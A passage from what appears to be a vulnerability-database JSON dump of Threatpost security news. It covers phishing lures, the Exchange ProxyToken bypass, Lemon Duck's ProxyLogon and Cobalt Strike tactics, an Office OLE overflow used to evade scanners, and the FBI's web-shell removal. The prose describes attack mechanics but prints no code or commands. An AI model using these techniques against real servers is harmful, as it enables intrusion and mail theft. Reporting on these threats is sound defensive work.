7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-05T14:08:09", "description": "Innovative twists on [banking scams and corporate-account hunters](<https://securelist.com/spam-and-phishing-in-q1-2021/102018/>) wielding increasingly clever lures, including those with COVID-19 vaccine promises, are likely to dominate the spam and phishing landscape throughout Q2 2021, according to researchers.\n\nAnd although no new wild trends have emerged, Kaspersky researchers, who just released their report for Q1 2021, said that the [spear-phishing tactics](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attackers are using against victims are getting better.\n\n## **Bank-Scam, QR-Code Phishing Lures **\n\nFor instance, mobile banking scams aren\u2019t anything new, however, attackers have developed a couple of new approaches.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nIn one example from Q1 2020, Kasperky reported that clients of several Dutch banks received a fraud email which prompted them to [scan a QR code](<https://threatpost.com/qr-codes-cyberattack-usage-spikes/165526/>) to \u201cunlock\u201d mobile banking. Instead, they were directed to a web page loaded with malware.\n\n[QR codes](<https://threatpost.com/anti-vaxxer-hijacks-qr-codes-covid19/165701/>) are an increasingly popular tool for threat actors, especially since the pandemic. They have been used to access menus, check in for vaccines and get public information.\n\nAnother banking scam observed by Kaspersky researchers delivered a fake newsletter posing as legitimate correspondence from MKB bank with updates on COVID-19, but instead delivered a scam Outlook sign-in page, attempting to harvest credentials.\n\nOther [phishing lures](<https://threatpost.com/buer-malware-loader-rewritten-rust/165782/>) observed last quarter by Kaspersky included offers of government payouts, intended to steal credit-card information and personal data.\n\n## **COVID-19 Vaccine Lures **\n\nCOVID-19 vaccines are the most important topic around the world at the moment, and malicious actors have capitalized on this over past several weeks.\n\n\n\nA scam COVID-19 vaccination lure. Source: Kaspersky. Click to enlarge.\n\n\u201cCybercriminals took advantage of people\u2019s desire to get vaccinated as quickly as possible,\u201d according to the report. \u201cFor instance, some U.K. residents received an email that appeared to come from the country\u2019s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link.\u201d\n\nAnother particularly despicable [COVID scam email](<https://threatpost.com/mcafee-covid-rpowershell-malware-surge/165382/>) specifically targeted people over 65 seeking a vaccine, the researchers added.\n\n\u201cIn both cases, to make a vaccination appointment, a form had to be filled out with personal data; and in the first case, the phishers also wanted bank-card details,\u201d the report explained. \u201cIf the victim followed all the instructions on the fake website, they handed their money and personal data to the attackers.\u201d\n\nFraudsters also blasted out [scam vaccination](<https://threatpost.com/europol-covid-19-vaccine-rollout-fraud-theft/161968/>) surveys, which were emails doctored up to look like they were from pharmaceutical companies making vaccines, asking for input.\n\n\u201cParticipants were promised a gift or cash reward for their help,\u201d the report added. \u201cAfter answering the questions, the victim was redirected to a page with the \u2018gift.'\u201d\n\nThe victim was then asked for personal information, or in some cases, even payment information to pay for delivery of the \u201cprize.\u201d\n\nScammers also sent emails convincingly disguised to look like they were sent from Chinese vaccine-makers.\n\n## **Hunt for Corporate Credentials Is On **\n\n\n\nA bogus mobile QR-code lure. Source: Kaspersky. Click to enlarge.\n\nBecause consumers are getting better at spotting scams, attackers are getting expert at making their communications seem real. This is especially important in trying to score what Kaspersky calls \u201ca coveted prize for scammers:\u201d [corporate usernames and passwords](<https://threatpost.com/sharepoint-phish-ransomware-attacks/165671/>).\n\n\u201cTo counter people\u2019s increasingly wary attitude to emails from outside, attackers try to give their mailings a respectable look, disguising them as messages from business tools and services,\u201d Kaspersky said. \u201cBy blending into the workflow, the scammers calculate that the user will be persuaded to follow the link and enter data on a fake page.\u201d\n\nThe team observed a malicious link being delivered through Microsoft Planner, and in Russia, they discovered an email posing as a message from an analytics portal support team. Both asked for corporate-account credentials.\n\n\u201cOld techniques, such as creating a unique fake page using JavaScript, were combined in Q1 with overtly business-themed phishing emails,\u201d the report said. \u201cIf previously scammers used common, but not always business-oriented, services as bait, the new batch of emails cited an urgent document awaiting approval or contract in need of review.\u201d\n\n## **The \u2018Less is More\u2019 Lure **\n\nAnother interesting lure type highlighted by the Kaspersky report asks for just a tiny amount of money to complete the scam transaction. In one example the team gives, the criminals only asked for 1.99 Rubles ($.27).\n\n\u201cThe calculation was simple: Users would be less averse to paying a small amount than a larger one, which means more potential victims willing to enter card details on the bogus site,\u201d the report explained. The emails usually had themes around everyday services like deliveries, fake \u201cinvoices\u201d for domain usage or a WhatsApp subscription.\n\nFacebook users were targeted last quarter by a scam lure saying their accounts were in violation of the platform\u2019s terms of use, Kaspersky said. The first link went to a legitimate Facebook page to reassure the victim that it was real. But the second link went to a phishing site.\n\n\u201cThe attackers\u2019 calculation was simple: First lull the victim\u2019s vigilance with a legitimate link, then get them to enter their credentials on a fake page,\u201d the report explained.\n\nOverall, spam traffic was down a bit (by 2.1 percent) in Q1. The Russian-language internet (\u201cRunet\u201d) also saw a small drop in spam of less than 2 percent, the report added. Russia accounted for the largest percent of outgoing spam with 22.47 percent, followed by Germany with 14.89 percent, Kaspersky found. The U.S. and China meanwhile followed with 12.98 percent and 7.38 percent of the world\u2019s spam traffic.\n\nMalicious email attachments detected were also down, but Kaspersky points out that this is primarily due to a boost in the number of attachments blocked by mail antivirus.\n\n## **Malware Families on the Rise **\n\nThe most common malicious attachments for spam emails in the quarter consisted of the Agensla malware, according to Kaspersky, with 8.91 percent of malicious trojan market; followed by Microsoft Equation Editor vulnerability exploits for CVE-2017-11882. The Badun family was third with 5.79 percent.\n\n\u201cThe Top 10 most common malicious attachments in Q4 corresponds exactly to the ranking of families,\u201d the report explained. \u201cThis suggests that each of the above-described families was widespread largely due to one member.\u201d\n\nOnline stores remain the most popular impersonation targets for phishing pages, the report added, accounting for 15.77 percent of those observed, Kaspersky said. Global internet portals (15.5 percent) and banks (10.04 percent) were close behind.\n\nFinally, Kaspersky warns about a potential slight uptick in tourism-related bait around the corner.\n\n\u201cAnd as the summer season approaches, an increase in the number of emails related to tourism is possible; however, due to the pandemic, it is likely to be small,\u201d the report said. \u201cOn the other hand, cybercriminals will almost certainly continue to actively hunt corporate-account credentials, exploiting the fact that many companies are still in remote-working mode and communication among employees is predominantly online.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-04T13:46:19", "type": "threatpost", "title": "Phishers Delivering Increasingly Convincing Lures", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2021-22893"], "modified": "2021-05-04T13:46:19", "id": "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "href": "https://threatpost.com/bait-phishers-convincing-lures/165834/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. These requests contain a SecurityToken cookie that identify them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain comprised of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T06:29:15", "description": "The Lemon Duck cryptocurrency-mining botnet has added the [ProxyLogon group of exploits](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) to its bag of tricks, targeting Microsoft Exchange servers.\n\nThat\u2019s according to researchers at Cisco Talos, who said that the cybercrime group behind Lemon Duck has also added the Cobalt Strike attack framework into its malware toolkit and has beefed up anti-detection capabilities. On the latter front, it\u2019s using fake domains on East Asian top-level domains (TLDs) to hide command-and-control (C2) infrastructure.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nLemon Duck targets victims\u2019 computer resources to mine the Monero virtual currency, with self-propagating capabilities and a modular framework that allows it to infect additional systems that become part of the botnet. It has been active since at least the end of December 2018, and Cisco Talos calls it \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve.\n\nFor instance, Lemon Duck has at least 12 different initial-infection vectors \u2013 more than most malware, with Proxylogon exploits only the latest addition. Its existing capabilities ranged from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing; targeting the RDP BlueKeep flaw (CVE-2019-0708) in Windows machines; [targeting internet-of-things devices](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) with weak or default passwords; and exploiting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n\u201cSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the Lemon Duck that target unpatched Microsoft Exchange Servers and attempt to download and execute payloads for Cobalt Strike DNS beacons,\u201d according to [an analysis](<https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html>) released Friday.\n\nCisco Talos researchers [previously observed](<https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/>) an increase in DNS requests connected with Lemon Duck\u2019s C2 and mining servers last August, with the attacks mainly targeting Egypt, India, Iran, the Philippines and Vietnam. In the latest rash of attacks, which began in April, the group has changed up its geographic targets to focus primarily on North America, followed by Europe and Southeast Asia, and a handful of victims in Africa and South America.\n\n## **Targeting Exchange Servers with Monero-Mining**\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the deployment of ransomware.\n\nThe highly publicized exploit chain suffered a barrage of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to info-stealers, and now financially motivated groups are getting in on the action too.\n\nIn Lemon Duck\u2019s case, once the Exchange servers are compromised, it executes various system commands using the Windows Control Manager (sc.exe), including copying two .ASPX files named \u201cwanlins.aspx\u201d and \u201cwanlin.aspx.\u201d\n\n\u201cThese files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a known directory where a majority of the web shells were initially observed following Microsoft\u2019s release of details related to Hafnium activity,\u201d according to the research.\n\nNext, Cisco Talos researchers observed the echo command being used to write code associated with a web shell into the previously created ASPX files, and the modification of the Windows registry to enable RDP access to the system.\n\n\u201cIn this case, several characteristics matched portions of code associated with known China Chopper variants identified days after the Exchange Server vulnerabilities were publicized,\u201d they noted.\n\nOther interesting aspects of the latest campaign include the fact that Lemon Duck executes a PowerShell script that downloads and executes an additional malware payload, \u201csyspstem.dat,\u201d which includes a \u201ckiller\u201d module which contains a hardcoded list of competing cryptocurrency miners that Lemon Duck disables. The module is run every 50 minutes.\n\nAlso, the malware is now leveraging Certutil to download and execute two new malicious PowerShell scripts, researchers said. Certutil is a native Windows command-line program that is installed as part of Certificate Services. It is used to verify and dump Certificate Authority (CA) information, get and publish new certificate revocation lists, and so on.\n\nOne of the PowerShell scripts, named \u201cdn.ps1,\u201d attempts to uninstall multiple antivirus products, and also retrieves a Cobalt Strike payload.\n\n## **Cobalt Strike Added to the Mix**\n\n[Cobalt Strike is a penetration-testing tool](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) that\u2019s commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it [simulates an attack](<https://www.cobaltstrike.com/features>). Threat actors have since figured out how to [turn it against networks](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to exfiltrate data, deliver malware and create fake C2 profiles that look legitimate and avoid detection.\n\nLemon Duck\u2019s Cobalt Strike payload is configured as a Windows DNS beacon and attempts to communicate with the C2 server using a DNS-based covert channel, researchers noted. The beacon then communicates with this specific subdomain to transmit encoded data via DNS A record query requests.\n\n\u201cThis represents a new TTP for Lemon Duck, and is another example of their reliance [on offensive security tools (OSTs)](<https://threatpost.com/malicious-software-infrastructure-easier-deploy/162913/>), including Powersploit\u2019s reflective loader and a modified Mimikatz, which are already included as additional modules and components of Lemon Duck and used throughout the typical attack lifecycle,\u201d according to Cisco Talos.\n\n## **Lemon Duck\u2019s Fresh Anti-Detection Tricks**\n\nWhile Lemon Duck casts a wide net in terms of victimology, it has been exclusively using websites within the TLDs for China (\u201c.cn\u201d), Japan (\u201c.jp\u201d) and South Korea (\u201c.kr\u201d) for its C2 activities since February, rather than the more familiar \u201c.com\u201d or \u201c.net.\u201d\n\n\u201cConsidering these [TLDs] are most commonly used for websites in their respective countries and languages\u2026this may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments,\u201d according to Cisco Talos. \u201cDue to the prevalence of domains using these [TLDs], web traffic to the domains\u2026may be more easily attributed as noise to victims within these countries.\u201d\n\nDuring the Lemon Duck infection process, PowerShell is used to invoke the \u201cGetHostAddresses\u201d method from the .NET runtime class \u201cNet.Dns\u201d to obtain the current IP address for an attacker-controlled domain, researchers explained.\n\n\u201cThis IP address is combined with a fake hostname hardcoded into the PowerShell command and written as an entry to the Windows hosts file,\u201d they said. \u201cThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the translation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such as DNS servers. This may allow the adversary to achieve longer-term persistence once operational in victim environments.\u201d\n\n## **Cryptojackers Take Notice of ProxyLogon**\n\nLemon Duck is not the first cryptomining malware to add ProxyLogon to its arsenal. For instance, another cryptojacking group [was seen in mid-April](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) doing the same thing.\n\nThat bad code was fairly simple, but also in mid-April a heretofore little-seen Monero-mining botnet [dubbed Prometei](<https://threatpost.com/prometei-botnet-apt-attacks/165574/>) began exploiting two of the Microsoft Exchange vulnerabilities in ProxyLogon. This malware is also highly complex and sophisticated, Cybereason researchers noted at the time. While cryptojacking is its current game, researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\nThe threat will likely continue to evolve, Cisco Talos researchers said. They also observed domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, used in relation to Microsoft Exchange attacks where ransomware was also deployed.\n\n\u201cAt this time, there doesn\u2019t appear to be a link between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2),\u201d according to the analysis. \u201cThis suggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of malicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems. In some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction more difficult.\u201d\n\nMeanwhile, it\u2019s clear that the threat actor behind Lemon Duck is continuously evolving its approach to maximize the ability to achieve its mission objectives, researchers noted.\n\n\u201cLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected systems to mine cryptocurrency and generate revenue for the adversary behind this botnet,\u201d they concluded. \u201cThe use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments. \u2026 Organizations should remain vigilant against this threat, as it will likely continue to evolve.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-10T17:37:44", "type": "threatpost", "title": "Lemon Duck Cryptojacking Botnet Changes Up Tactics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-10T17:37:44", "id": "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "href": "https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:40:52", "description": "SAN FRANCISCO \u2013 A previously unknown bug in Microsoft Office has been spotted being actively exploited in the wild; it can be used to bypass security solutions and sandboxes, according to findings released at the RSA Conference 2019.\n\nThe bug exists in the OLE file format and the way it\u2019s handled in Microsoft Word, said researchers from Mimecast. They noted that the OLE32.dll library incorrectly handles integer overflows.\n\nMicrosoft told the researchers that patching the problem is on the back burner.\n\nThe flaw allows attackers to hide exploits in weaponized Word documents in a way that won\u2019t trigger most antivirus solutions, the researchers said. In a recent spam campaign observed by Mimecast, attached Word attachments contained a hidden exploit for an older vulnerability in Microsoft Equation Editor (CVE-2017-11882). On unpatched systems, the exploit unfolded to drop a new variant of Java JACKSBOT, a remote access backdoor that infects its target only if Java is installed.\n\nJACKSBOT is capable of taking complete control of the compromised system. It has full-service espionage capabilities, including the ability to collect keystrokes; steal cached passwords and grab data from web forms; take screenshots; take pictures and record video from a webcam; record sound from the microphone; transfer files; collect general system and user information; steal keys for cryptocurrency wallets; manage SMS for Android devices; and steal VPN certificates.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe thing that stands out for me is that the attackers behind this were keen on using the Equation exploit, probably because they found it more reliable than others, and they then worked out on a bypass to allow this go through undetected,\u201d Meni Farjon, chief scientist for advanced threat detection at Mimecast, told Threatpost. \u201cThis process of chaining these two, a code-execution exploit and a flaw which leads to a bypass is somewhat unique and we don\u2019t see many of these in data-format exploits.\u201d\n\n## The Flaw in Depth\n\nAn Object Linking and Embedding (OLE) Compound File essentially acts as an underlying file system for information and objects present in a Microsoft Word document. It contains streams of data that are treated like individual files embedded within the OLE file itself. Each stream has a name (for example, the top-level stream of a document is straightforwardly named \u201cWordDocument). Streams can also contain information on macros in the document and the metadata of a document (i.e., title, author, creation date, etc.).\n\nMimecast said that according to the format specifications for the Compound File Binary File Format, the OLE stream header contains a table called DIFAT, which is made up of an array of numbers that includes section IDs and some special numbers \u2013 it\u2019s here that the problem resides.\n\n\u201cTo access the sector N in the table, it\u2019s offset computed using the following formula: sector size * (sector ID + 1), when sector ID is DIFAT[N],\u201d the researchers explained in findings. \u201cIt seems that when a big sector ID exists, [this formula] leads to an integer-overflow that results in a relatively small offset. Because the result is more than 32 bits (integer overflow), only the lowest 32 bits will be the product when the code above performs the calculation. In other words, the calculated offset will be 0x200 = 512.\u201d\n\nThe system sees an impossible offset, according to the researchers; this can lead it to crash or, at the very least, ignore the section, including any exploit that may be hiding there.\n\n\u201cThis behavior is not documented by Microsoft, but it can confuse high-level parsers, which will not notice the overflow,\u201d Mimecast said.\n\n## In the Wild\n\nMimecast researchers said that they\u2019ve seen several attacks in the last few months that chain together the CVE-2017-11882 exploit with the OLE flaw, which has been successful, they said, in amplifying the attack to make it go undetected.\n\n\u201cOur systems were able to spot an attacker group, which seems to originate from Serbia, using specially crafted Microsoft Word documents\u2026in a way which caused the attacks to circumvent many security solutions designed to protect data from infestation,\u201d Mimecast said. The firm didn\u2019t specify which security solutions they\u2019re referring to.\n\n\u201c[With] this chaining of the older exploit with this integer overflow, Microsoft Office Word mishandles this error. It ignores the higher bytes of the OLE sector ID, loading the malicious object ([CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)) into memory while not following the correct guidelines,\u201d the researchers said.\n\nFarjon told Threatpost that although the newly found issue is being used in the wild, \u201cexploiting this is not an easy task, as it requires deep format understanding.\u201d It\u2019s the difficulty in execution that is likely behind Microsoft\u2019s decision to not immediately patch the problem, he said.\n\n## Microsoft Response\n\nDespite evidence that the flaw is being actively exploited to great effect in the wild, the Microsoft Security Response Center told Mimecast that it will not be fixing OLE with a security patch anytime soon, because the issue by itself does not result in memory corruption and thus doesn\u2019t meet the security bar for an immediate fix.\n\n\u201cWhat Microsoft said is that they won\u2019t be fixing it right now, but perhaps they will on a later undefined date,\u201d Farjon told Threatpost.\n\nHe added, \u201cThey said it is an unintended behavior, but at the same time that it is not important enough to fix right now. Realistically, Microsoft needs to prioritize their work on patches, so their decision makes sense. That being said, it\u2019s up to security professionals to make sure their systems are as up to date as possible and that they are leveraging the threat intelligence they need to better manage today\u2019s evolving threats.\u201d\n\nThe researcher also offered a bottom-line assessment: \u201cAnalyzing all possible outcomes of such flaw is a tough task,\u201d he said. \u201cMimecast worked with the Microsoft Security Response Center and they did analyze all possible outcomes, and came to the conclusion that it didn\u2019t result in memory corruption. So, while it may not be severe, having another tool for attackers to bypass security solutions is not a good thing.\u201d\n\nThreatpost reached out to the computing giant for comments on the findings, and received a short statement: _\u201c_The bug submitted did not meet the severity bar for servicing via a security update,\u201d said a Microsoft spokesperson.\n\n**_Follow all of Threatpost\u2019s RSA Conference 2019 coverage by visiting our [special coverage section](<https://threatpost.com/microsite/rsa-conference-2019-show-coverage/>)._**\n", "cvss3": {}, "published": "2019-03-05T11:00:03", "type": "threatpost", "title": "RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2019-19781"], "modified": "2019-03-05T11:00:03", "id": "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "href": "https://threatpost.com/zero-day-exploit-microsoft/142327/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-15T09:53:19", "description": "The Feds have cleared malicious web shells from hundreds of vulnerable computers in the United States that had been compromised via the now-infamous ProxyLogon Microsoft Exchange vulnerabilities.\n\nProxyLogon comprises a group of security bugs affecting on-premises versions of Microsoft Exchange Server software for email. Microsoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile patching levels have accelerated, this doesn\u2019t help already-compromised computers.\n\n\u201cMany infected system owners successfully removed the web shells from thousands of computers,\u201d explained the Department of Justice, in a [Tuesday announcement](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>). \u201cOthers appeared unable to do so, and hundreds of such web shells persisted unmitigated.\u201d\n\nThis state of affairs prompted the FBI to take action; in a court-authorized action, it issued a series of commands through the web shells to the affected servers. The commands were designed to cause the server to delete only the web shells (identified by their unique file path). It didn\u2019t notify affected organizations ahead of time, but authorities said they\u2019re sending out notices now.\n\n\u201cToday\u2019s court-authorized removal of the malicious web shells demonstrates the Department\u2019s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,\u201d said Assistant Attorney General John Demers for the DoJ\u2019s National Security Division, in the statement.\n\n## **Unilateral FBI Action Against ProxyLogon Exploits**\n\nOther technical details of the action are being kept under wraps, but Erkang Zheng, founder and CEO at JupiterOne, noted that the action is unprecedented.\n\n\u201cWhat makes this really interesting is the court ordered remote remediation of vulnerable systems,\u201d he said via email. \u201cThis is the first time that this has happened and with this as a precedent, it likely won\u2019t be the last. Many 